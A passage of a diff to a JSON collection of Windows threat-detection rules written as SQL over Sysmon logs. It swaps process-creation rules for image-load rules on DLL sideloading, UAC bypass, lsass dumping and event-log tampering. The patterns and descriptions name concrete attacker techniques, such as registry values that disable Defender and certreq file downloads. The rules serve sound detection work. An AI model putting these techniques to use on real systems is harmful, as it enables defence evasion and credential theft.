'%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": 
"Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects 
cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE 
'\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - 
"filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - 
"author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
